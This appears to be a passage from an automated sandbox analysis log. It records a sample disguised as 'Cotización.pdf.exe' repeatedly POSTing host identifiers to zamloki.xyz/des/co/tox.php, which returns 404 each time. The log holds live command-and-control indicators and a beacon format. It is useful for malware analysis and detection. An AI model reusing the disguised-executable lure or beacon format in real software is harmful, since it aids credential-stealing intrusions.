                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:54.194818020 CEST1382OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:54.214418888 CEST1383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:54.474117994 CEST1383INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:54 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IyHb42E22oYNxRtTJnYIviziMD42mr1vlWOe%2Bzf7gjP8Ms5ACvJ3qnzHa0odV6U%2B97XhLN7NpbJRuEMygpBGicrkoJLU5%2BP%2BWzgZtri4aZdJdydGIAJmb3U%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26477cf0d05b7-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      80192.168.2.349814104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:34.994338036 CEST5899OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:35.012172937 CEST5899OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:35.255206108 CEST5900INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d1LoeaMuTI08TBXvzw1pxvkAHe2KMkG%2B%2FmmwQH50rYZI7CeE2X3sh3gehLght9OiLtM2ACEo%2FOVVKEUzFyz2RKlLqTdcxKvAP5AxR0%2F%2FyGNlviXo87IQt2o%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26576c8f94e7a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      81192.168.2.349815104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:35.507626057 CEST5901OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:35.534342051 CEST5901OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:35.880002022 CEST5902INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9b3W%2Bd%2FZufbndUt%2FKw3LJpSyvFQ3P8fQMI9W%2BVc8vbnvQ6yRvDc3NXFbkUky8jJGN7XQDFMlNSrn5OJCMmUSWGprbO4paE%2F0V5HqH8JEObI8cWtgFWK53RQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26579fc2e4e25-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      82192.168.2.349816172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:36.112576962 CEST5903OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:36.130700111 CEST5903OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:36.375061989 CEST5904INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:36 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5F7wUbPj9bpKN4oinEDMgZT29ONLvqdNn%2FvtZc%2FnAk%2B%2BUNbZcd3TElTzS1IMPYlRuxSyTQlBI8%2BGipYlw%2FYZ8B%2BijCFTh8h4lwqCP%2FpqRPE2PuTNHyxQg2ttysD02w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2657dc8204a7a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      83192.168.2.349817104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:36.636157990 CEST5904OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:36.655987024 CEST5905OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:36.899303913 CEST5905INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:36 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pa04CdQXh%2BG1aiKrp2Q1zm58Q7Cx%2Fpx9K1cPn%2FcBJEN%2FGh9DQJwv7lvy%2BV5Ne78q0JNORoBHb9pe0LH5%2Bq%2BKaEPSA0HeZJ0gte88m35AxSc%2FRCtsxrFZt8VeRJ0Y3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26581097f96b0-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      84192.168.2.349818172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:37.137891054 CEST5906OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:37.156230927 CEST5907OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:37.515099049 CEST5907INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=atDnWNFzYCbOCMTzUn6nAR2dp7hxydUpvf851xmsqII91hlVZCyWwTJwdWzv8F1RaAmyXoJuEJ565WMxqcxksJHqL4P8eOJzr8JoZQQbh5z8odudM%2BaMBZ0%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26584294d4e55-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      85192.168.2.349819172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:37.802136898 CEST5908OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:37.823693991 CEST5908OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:38.083323002 CEST5909INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:38 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=k0vfwK4hPVGiEWYaulf0RX9Iobl%2FCAAAWjelUJuX9880OE4P5UOEe3rVIEMuGSM9%2FFFzjncM%2FcdPtJhncozgKzlpWblP9pl15erN4tKJHt9S19A%2BfgRaBSA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265885a0f4a68-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      86192.168.2.349820104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:38.314249039 CEST5910OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:38.331937075 CEST5910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:38.590396881 CEST5911INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:38 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7l8kJn%2FnZ%2Bagi%2Bw8DHhB590MTIQjSxanLml5KE%2FEh2SEfWB675yTQoqe2NZLnLb6AlxLpycisjXsSDFBbNjKGoNwxD%2Bs8DKrwcHGsBe5djQC0IJkIg09U0mSjvI9ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2658b886ddff7-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      87192.168.2.349821104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:38.844782114 CEST5912OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:38.864535093 CEST5912OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:39.142889977 CEST5913INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VjJBlDHgSjyxdCZjGM%2BJtKmTv0khygZghLhSSkLrOfBDY%2BbBAZJS8Mx7caC%2B2mB5EMM%2FDVEuHYFtnBub%2FjTTr4uQ0xUOsfpZPpkEEbiaYkpq03E57WMq0kBRsKbreQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2658ede9f0742-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      88192.168.2.349822172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:39.404854059 CEST5914OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:39.424777985 CEST5915OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:39.692692041 CEST5915INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=5OmfuqzqHQjzeksCgCSBGtibKOA3OqKQbEtWcRUXIgMvKEK5FCGqdYqjBsUk2u3CeqF4Y9KgUTYjO3vs8K1yax6ofaQbAHzvy2rctWuIVAJ3PCR5SIntSVw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265925cc04ea4-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      89192.168.2.349823172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:40.218810081 CEST5916OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:40.238717079 CEST5917OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:40.552135944 CEST5917INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:40 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=R1SEc%2FRawQqKMsVfNRO%2FRXqFfk%2B9A0nX6BTZpfWfd1RYC7o23FidW3sxw2Tr7qpIhPfVJB4%2FonyIx%2FVexUutFMZtMIi0aAG6Tjcs6PU584bYfbHN%2F4%2BbXgk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2659779b80625-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      9192.168.2.349734172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:54.766119957 CEST1384OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:54.786243916 CEST1384OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:55.033678055 CEST1385INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RulHD4zM3oXgr1qo2K%2FlE4ZMi4ezNMfN9C%2Bk4V0%2Fc2OiwlRtA%2BiSSREnXeSlXvKY6xreGh%2Bd%2B07dKbBp2inqOghHs7p2Ev7Inz2yYUWb6pbAkvaNCqv3vZS6hB0YbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2647b5cd1bf28-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      90192.168.2.349824104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:40.848512888 CEST5918OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:40.868215084 CEST5919OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:41.136240005 CEST5919INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:41 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fP2KMRR8k5hKrY88AkcnAEVDXVipKErUO1rx628XxUM9GpQ817qZSwLK94okbEID%2Burobx2gDy%2Fo7SfrzcPWRTvY93wQXW8KCkJy0AR4Jz%2ByDCRfp9r3ZNQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2659b5d924dca-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      91192.168.2.349825104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:41.921113014 CEST5920OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:41.938930035 CEST5920OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:42.198082924 CEST5921INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:42 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Wmk36wswxGllNs2laWGJ1Q68H3BUf%2BrZyCBGatFJk2nwNl0YmwQxBiK4erEupLVtsjmAXlK3bt2qEpy8s1QIA8oqElXldw8sos629uwNXbzKAohcu4sxqag%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265a208663248-FRA
